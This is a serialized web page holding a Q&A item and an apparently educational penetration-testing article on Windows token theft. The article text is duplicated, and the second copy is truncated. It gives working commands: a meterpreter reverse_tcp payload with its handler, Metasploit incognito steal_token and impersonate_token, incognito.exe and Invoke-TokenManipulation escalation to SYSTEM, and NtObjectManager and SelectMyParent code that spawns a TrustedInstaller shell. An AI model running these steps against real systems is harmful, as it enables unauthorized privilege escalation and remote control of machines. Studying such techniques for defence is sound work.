[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fqqrktdHaPdidlhjmKQqYSRUaCqgklozEMLrm8iEHcHA":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":50,"createdAt":50,"_status":49},151,"How can you gain TrustedInstaller privileges using token manipulation?","To obtain TrustedInstaller privileges, start the TrustedInstaller service, then use token manipulation tools like Incognito, Invoke-TokenManipulation, or SelectMyParent to create a child process with the TrustedInstaller.exe token. For example, in PowerShell with NtObjectManager: `$p = Get-NtProcess -Name TrustedInstaller.exe; New-Win32Process cmd.exe -ParentProcess $p`. This allows modification of system files, even bypassing SYSTEM restrictions, as detailed in the [original article](\u002Fnews\u002Fpenetration-techniques-token-theft-and-exploitation).","\u003Cp>To obtain TrustedInstaller privileges, start the TrustedInstaller service, then use token manipulation tools like Incognito, Invoke-TokenManipulation, or SelectMyParent to create a child process with the TrustedInstaller.exe token. For example, in PowerShell with NtObjectManager: `$p = Get-NtProcess -Name TrustedInstaller.exe; New-Win32Process cmd.exe -ParentProcess $p`. This allows modification of system files, even bypassing SYSTEM restrictions, as detailed in the [original article](\u002Fnews\u002Fpenetration-techniques-token-theft-and-exploitation).\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fpenetration-techniques-token-theft-and-exploitation\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","how-can-you-gain-trustedinstaller-privileges-using-token-manipulation-1777484943665","TrustedInstaller, token manipulation, privilege escalation, NtObjectManager",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":46,"updatedAt":47,"createdAt":48,"_status":49},40,"Penetration Techniques - Token Theft and Exploitation","penetration-techniques-token-theft-and-exploitation","Explore token theft and exploitation techniques for Windows penetration testing, including Metasploit incognito, Invoke-TokenManipulation, and privilege escalation methods.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>In the previous article 'Penetration Techniques - Program Downgrade Startup', the method of using SelectMyParent for downgrading was introduced, which essentially achieves this through token theft. This time, we will further explore token theft and exploitation, test common tools, and share exploitation techniques.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>Introduction to Tokens\u003C\u002Fli>\u003Cli>Incognito in Metasploit\u003C\u002Fli>\u003Cli>Incognito on Windows Platform\u003C\u002Fli>\u003Cli>Usage of Invoke-TokenManipulation.ps1\u003C\u002Fli>\u003Cli>Gaining System Privileges Using Tokens\u003C\u002Fli>\u003Cli>Gaining TrustedInstaller Privileges Using Tokens\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Introduction to Tokens\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Windows has two types of tokens:\u003C\u002Fp>\u003Cul>\u003Cli>Delegation token: Used for interactive session logins (e.g., local user direct login, remote desktop login)\u003C\u002Fli>\u003Cli>Impersonation token: Used for non-interactive logins (e.g., accessing shared folders via net use)\u003C\u002Fli>\u003C\u002Ful>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Both tokens are only cleared after a system reboot\u003C\u002Fp>\u003Cp>A user with a Delegation token, after logging off, will have that token converted to an Impersonation token, which remains valid\u003C\u002Fp>\u003Ch3>Actual test\u003C\u002Fh3>\u003Cp>Log in with Test\\a, then log off, and log in again as administrator\u003C\u002Fp>\u003Cp>View tokens:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>incognito.exe list_tokens -u\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Can obtain the token of the logged-off user Test\\a, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019809514_0_d8c2a6d38b.jpeg\">\u003C\u002Fp>\u003Cp>Use this token to execute calc.exe:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>incognito.exe execute -c \"TEST\\a\" calc.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The background shows the process calc.exe with the username a, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019821847_1_a66c6b5b62.jpeg\">\u003C\u002Fp>\u003Ch2>0x03 Incognito in Metasploit\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>In Metasploit, incognito can be used to achieve token theft. Common commands are as follows:\u003C\u002Fp>\u003Cp>Load incognito: load incognito\u003C\u002Fp>\u003Cp>List tokens: list_tokens -u\u003C\u002Fp>\u003Cp>View current token: getuid\u003C\u002Fp>\u003Cp>Elevate to system privileges: getsystem\u003C\u002Fp>\u003Cp>Token theft: impersonate_token \"NT AUTHORITY\\\\SYSTEM\"\u003C\u002Fp>\u003Cp>Steal from process: steal_token 1252\u003C\u002Fp>\u003Cp>Revert to previous token: rev2self or drop_token\u003C\u002Fp>\u003Ch3>Practical testing\u003C\u002Fh3>\u003Cp>Client:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>msfpayload -p windows\u002Fmeterpreter\u002Freverse_tcp LHOST=192.168.81.142 LPORT=44444 X &gt;test.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Server:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>use exploit\u002Fmulti\u002Fhandler\u003Cbr>set payload windows\u002Fmeterpreter\u002Freverse_tcp\u003Cbr>set LPORT 44444\u003Cbr>set LHOST 192.168.81.142\u003Cbr>exploit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Execute getsystem to obtain SYSTEM privileges\u003C\u002Fp>\u003Cp>PID 1252 has current user privileges, execute steal_token 1252 to switch privileges to WIN-R7MM90ERBMD\\a\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019831753_2_f5351a80ee.jpeg\">\u003C\u002Fp>\u003Cp>Execute impersonate_token \"NT AUTHORITY\\\\SYSTEM\" to switch privileges to SYSTEM\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Requires quotes and double backslashes, \"NT AUTHORITY\\\\SYSTEM\"\u003C\u002Fp>\u003Cp>Execute rev2self to return to previous token, which is WIN-R7MM90ERBMD\\a\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019847410_3_409bf669cf.jpeg\">\u003C\u002Fp>\u003Cp>Through the above demonstration, successful privilege switching was achieved via token theft.\u003C\u002Fp>\u003Ch2>0x04 Incognito on Windows Platform\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Incognito in Metasploit was ported from the Windows version of Incognito. Below is an introduction to Incognito on the Windows platform.\u003C\u002Fp>\u003Cp>\u003Cstrong>Download link:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>https:\u002F\u002Flabs.mwrinfosecurity.com\u002Fassets\u002FBlogFiles\u002Fincognito2.zip\u003C\u002Fp>\u003Cp>\u003Cstrong>Reference manual:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>http:\u002F\u002Flabs.mwrinfosecurity.com\u002Fassets\u002F142\u002Fmwri_security-implications-of-windows-access-tokens_2008-04-14.pdf\u003C\u002Fp>\u003Cp>Common usage is as follows:\u003C\u002Fp>\u003Cp>List tokens: incognito.exe list_tokens -u\u003C\u002Fp>\u003Cp>Duplicate token: incognito.exe execute [options] \u003Ctoken> \u003Ccommand>\u003C\u002Fcommand>\u003C\u002Ftoken>\u003C\u002Fp>\u003Ch3>Practical testing\u003C\u002Fh3>\u003Cp>List tokens:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>incognito.exe list_tokens -u\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019862849_4_3d573af96d.jpeg\">\u003C\u002Fp>\u003Cp>Privilege escalation to SYSTEM:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>incognito.exe execute -c \"NT AUTHORITY\\SYSTEM\" cmd.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019867420_5_7511ddb211.jpeg\">\u003C\u002Fp>\u003Cp>Privilege reduction to current user:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>incognito.exe execute -c \"WIN-R7MM90ERBMD\\a\" cmd.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Impersonate user:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>incognito.exe execute -c \"WIN-R7MM90ERBMD\\b\" cmd.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019870965_6_14c99a9897.jpeg\">\u003C\u002Fp>\u003Ch2>0x05 Invoke-TokenManipulation.ps1 Usage\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>\u003Cstrong>Download link:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FPowerShellMafia\u002FPowerSploit\u002Fblob\u002Fmaster\u002FExfiltration\u002FInvoke-TokenManipulation.ps1\u003C\u002Fp>\u003Cp>Similar in principle and function to incognito, capable of actual privilege escalation and de-escalation\u003C\u002Fp>\u003Cp>Enumerate tokens: Invoke-TokenManipulation -Enumerate\u003C\u002Fp>\u003Cp>Escalate to system: Invoke-TokenManipulation -CreateProcess \"cmd.exe\" -Username \"nt authority\\system\"\u003C\u002Fp>\u003Cp>Copy process token: Invoke-TokenManipulation -CreateProcess \"cmd.exe\" -ProcessId 500\u003C\u002Fp>\u003Cp>Copy thread token: Invoke-TokenManipulation -CreateProcess \"cmd.exe\" -ThreadId 500\u003C\u002Fp>\u003Cp>More usage can be found in the script documentation\u003C\u002Fp>\u003Cp>Actual testing omitted\u003C\u002Fp>\u003Ch2>0x06 Exploiting tokens to gain TrustedInstaller privileges\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>In the Windows system, even with administrator and system privileges, system files cannot be modified\u003C\u002Fp>\u003Cp>Because the highest privilege in Windows is TrustedInstaller\u003C\u002Fp>\u003Cp>For example, the path C:\\Windows\\servicing\u003C\u002Fp>\u003Cp>Cannot create files in this path with system privileges\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019875709_7_d65423d76d.jpeg\">\u003C\u002Fp>\u003Cp>Check folder properties, showing that the system does not have write permissions, only TrustedInstaller does.\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019879623_8_719b1f5aa5.jpeg\">\u003C\u002Fp>\u003Cp>For how to obtain TrustedInstaller permissions, refer to this article by James Forshaw, which is highly recommended for learning.\u003C\u002Fp>\u003Cp>https:\u002F\u002Ftyranidslair.blogspot.nl\u002F2017\u002F08\u002Fthe-art-of-becoming-trustedinstaller.html\u003C\u002Fp>\u003Cp>Here, we test one of the examples to find other implementation methods.\u003C\u002Fp>\u003Cp>Starting the TrustedInstaller service launches the process TrustedInstaller.exe, located at C:\\Windows\\servicing\\TrustedInstaller.exe. Check the program's permissions:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-Acl -Path C:\\Windows\\servicing\\TrustedInstaller.exe | select Owner\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Shows as NT SERVICE\\TrustedInstaller, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019883076_9_96c74fec74.jpeg\">\u003C\u002Fp>\u003Cp>James Forshaw's implementation approach is to use the token of TrustedInstaller.exe to create a child process, so the child process gains TrustedInstaller permissions. The specific PowerShell code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Set-NtTokenPrivilege SeDebugPrivilege\u003Cbr>$p = Get-NtProcess -Name TrustedInstaller.exe\u003Cbr>$proc = New-Win32Process cmd.exe -CreationFlags NewConsole -ParentProcess $p\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>PowerShell does not support the Set-NtTokenPrivilege command by default; this module needs to be downloaded and installed.\u003C\u002Fp>\u003Cp>\u003Cstrong>Download address:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.powershellgallery.com\u002Fpackages\u002FNtObjectManager\u002F1.1.1\u003C\u002Fp>\u003Cp>Installation command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Save-Module -Name NtObjectManager -Path c:\\test\u003Cbr>Install-Module -Name NtObjectManager\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Save-Module requires PowerShell v5.0 support. For details, see:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fzh-cn\u002Fpowershell\u002Fgallery\u002Freadme\u003C\u002Fp>\u003Cp>Therefore, the test system is selected as Win10, with a default PowerShell version of 5.0\u003C\u002Fp>\u003Cp>Importing this module requires the system to allow PowerShell script execution, so first execute the following code:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Set-ExecutionPolicy Unrestricted\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Import module NtObjectManager:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Import-Module NtObjectManager\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Execute command test:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>sc.exe start TrustedInstaller\u003Cbr>Set-NtTokenPrivilege SeDebugPrivilege\u003Cbr>$p = Get-NtProcess -Name TrustedInstaller.exe\u003Cbr>$proc = New-Win32Process cmd.exe -CreationFlags NewConsole -ParentProcess $p\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Use whoami to check current cmd privileges:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>whoami \u002Fgroups \u002Ffo list\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Found current cmd.exe is in the TrustedInstaller group, successfully obtained TrustedInstaller privileges\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019886811_10_62b8d2941c.jpeg\">\u003C\u002Fp>\u003Cp>Then, following the updated content in James Forshaw's article, learned Vincent Yiu@vysecurity's method, using incognito from metasploit can also obtain TrustedInstaller privileges\u003C\u002Fp>\u003Cp>\u003Cstrong>Address as follows:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>https:\u002F\u002Ftwitter.com\u002Fvysecurity\u002Fstatus\u002F899303538630774787\u003C\u002Fp>\u003Cp>Approach as follows:\u003C\u002Fp>\u003Cul>\u003Cli>Start the TrustedInstaller service\u003C\u002Fli>\u003Cli>Use incognito to obtain the token of TrustedInstaller.exe\u003C\u002Fli>\u003Cli>Obtain TrustedInstaller privileges\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Use the following commands:\u003C\u002Fp>\u003Cul>\u003Cli>load incognito\u003C\u002Fli>\u003Cli>getsytem\u003C\u002Fli>\u003Cli>ps\u003C\u002Fli>\u003Cli>steal_token 3204\u003C\u002Fli>\u003Cli>getuid\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Following this logic, it's speculated that using SelectMyParent and Invoke-TokenManipulation.ps1 can also obtain TrustedInstaller privileges\u003C\u002Fp>\u003Cp>Now verify our judgment\u003C\u002Fp>\u003Cp>\u003Cstrong>1. SelectMyParent\u003C\u002Fstrong>\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>sc start TrustedInstaller\u003Cbr>SelectMyParent.exe cmd.exe 1700\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The new cmd.exe has TrustedInstaller privileges\u003C\u002Fp>\u003Cp>\u003Cstrong>2. Invoke-TokenManipulation.ps1\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Add the following code:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>sc.exe start TrustedInstaller\u003Cbr>$id = Get-Process -name TrustedInstaller* | Select-Object id | ForEach-Object -Process{$_.id}\u003Cbr>Invoke-TokenManipulation -CreateProcess \"cmd.exe\" -ProcessId $id\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The 'sc' command cannot be directly executed in PowerShell as it is treated as an alias for Set-Content. Use sc.exe to run the sc command within PowerShell.\u003C\u002Fp>\u003Ch3>Methods to verify TrustedInstaller privilege acquisition\u003C\u002Fh3>\u003Cp>\u003Cstrong>1. Write files to special paths\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>For example C:\\Windows\\servicing, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019888347_11_70331d0b4d.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>2. Using PowerShell\u003C\u002Fstrong>\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-Acl -Path C:\\Windows\\servicing\\TrustedInstaller.exe | select Owner\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The echo should display NT SERVICE\\TrustedInstaller\u003C\u002Fp>\u003Cp>\u003Cstrong>3. Using whoami\u003C\u002Fstrong>\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>whoami \u002Fgroups | findstr TrustedInstaller\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Check if there is any echo\u003C\u002Fp>\u003Ch2>0x07 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces the implementation methods of token theft, using various tools to obtain system privileges and TrustedInstaller privileges.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>In the previous article 'Penetration Techniques - Program Downgrade Startup', the method of using SelectMyParent for downgrading was introduced, which essentially achieves this through token theft. This time, we will further explore token theft and exploitation, test common tools, and share exploitation techniques.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>Introduction to Tokens\u003C\u002Fli>\u003Cli>Incognito in Metasploit\u003C\u002Fli>\u003Cli>Incognito on Windows Platform\u003C\u002Fli>\u003Cli>Usage of Invoke-TokenManipulation.ps1\u003C\u002Fli>\u003Cli>Gaining System Privileges Using Tokens\u003C\u002Fli>\u003Cli>Gaining TrustedInstaller Privileges Using Tokens\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Introduction to Tokens\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Windows has two types of tokens:\u003C\u002Fp>\u003Cul>\u003Cli>Delegation token: Used for interactive session logins (e.g., local user direct login, remote desktop login)\u003C\u002Fli>\u003Cli>Impersonation token: Used for non-interactive logins (e.g., accessing shared folders via net use)\u003C\u002Fli>\u003C\u002Ful>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Both tokens are only cleared after a system reboot\u003C\u002Fp>\u003Cp>A user with a Delegation token, after logging off, will have that token converted to an Impersonation token, which remains valid\u003C\u002Fp>\u003Ch3>Actual test\u003C\u002Fh3>\u003Cp>Log in with Test\\a, then log off, and log in again as administrator\u003C\u002Fp>\u003Cp>View tokens:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>incognito.exe list_tokens -u\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Can obtain the token of the logged-off user Test\\a, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019809514_0_d8c2a6d38b-1.jpeg\">\u003C\u002Fp>\u003Cp>Use this token to execute calc.exe:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>incognito.exe execute -c \"TEST\\a\" calc.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The background shows the process calc.exe with the username a, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019821847_1_a66c6b5b62-1.jpeg\">\u003C\u002Fp>\u003Ch2>0x03 Incognito in Metasploit\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>In Metasploit, incognito can be used to achieve token theft. Common commands are as follows:\u003C\u002Fp>\u003Cp>Load incognito: load incognito\u003C\u002Fp>\u003Cp>List tokens: list_tokens -u\u003C\u002Fp>\u003Cp>View current token: getuid\u003C\u002Fp>\u003Cp>Elevate to system privileges: getsystem\u003C\u002Fp>\u003Cp>Token theft: impersonate_token \"NT AUTHORITY\\\\SYSTEM\"\u003C\u002Fp>\u003Cp>Steal from process: steal_token 1252\u003C\u002Fp>\u003Cp>Revert to previous token: rev2self or drop_token\u003C\u002Fp>\u003Ch3>Practical testing\u003C\u002Fh3>\u003Cp>Client:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>msfpayload -p windows\u002Fmeterpreter\u002Freverse_tcp LHOST=192.168.81.142 LPORT=44444 X &gt;test.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Server:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>use exploit\u002Fmulti\u002Fhandler\u003Cbr>set payload windows\u002Fmeterpreter\u002Freverse_tcp\u003Cbr>set LPORT 44444\u003Cbr>set LHOST 192.168.81.142\u003Cbr>exploit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Execute getsystem to obtain SYSTEM privileges\u003C\u002Fp>\u003Cp>PID 1252 has current user privileges, execute steal_token 1252 to switch privileges to WIN-R7MM90ERBMD\\a\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019831753_2_f5351a80ee-1.jpeg\">\u003C\u002Fp>\u003Cp>Execute impersonate_token \"NT AUTHORITY\\\\SYSTEM\" to switch privileges to SYSTEM\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Requires quotes and double backslashes, \"NT AUTHORITY\\\\SYSTEM\"\u003C\u002Fp>\u003Cp>Execute rev2self to return to previous token, which is WIN-R7MM90ERBMD\\a\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019847410_3_409bf669cf-1.jpeg\">\u003C\u002Fp>\u003Cp>Through the above demonstration, successful privilege switching was achieved via token theft.\u003C\u002Fp>\u003Ch2>0x04 Incognito on Windows Platform\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Incognito in Metasploit was ported from the Windows version of Incognito. Below is an introduction to Incognito on the Windows platform.\u003C\u002Fp>\u003Cp>\u003Cstrong>Download link:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>https:\u002F\u002Flabs.mwrinfosecurity.com\u002Fassets\u002FBlogFiles\u002Fincognito2.zip\u003C\u002Fp>\u003Cp>\u003Cstrong>Reference manual:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>http:\u002F\u002Flabs.mwrinfosecurity.com\u002Fassets\u002F142\u002Fmwri_security-implications-of-windows-access-tokens_2008-04-14.pdf\u003C\u002Fp>\u003Cp>Common usage is as follows:\u003C\u002Fp>\u003Cp>List tokens: incognito.exe list_tokens -u\u003C\u002Fp>\u003Cp>Duplicate token: incognito.exe execute [options] \u003Ctoken> \u003Ccommand>\u003C\u002Fcommand>\u003C\u002Ftoken>\u003C\u002Fp>\u003Ch3>Practical testing\u003C\u002Fh3>\u003Cp>List tokens:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>incognito.exe list_tokens -u\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019862849_4_3d573af96d-1.jpeg\">\u003C\u002Fp>\u003Cp>Privilege escalation to SYSTEM:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>incognito.exe execute -c \"NT AUTHORITY\\SYSTEM\" cmd.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019867420_5_7511ddb211-1.jpeg\">\u003C\u002Fp>\u003Cp>Privilege reduction to current user:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>incognito.exe execute -c \"WIN-R7MM90ERBMD\\a\" cmd.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Impersonate user:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>incognito.exe execute -c \"WIN-R7MM90ERBMD\\b\" cmd.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" 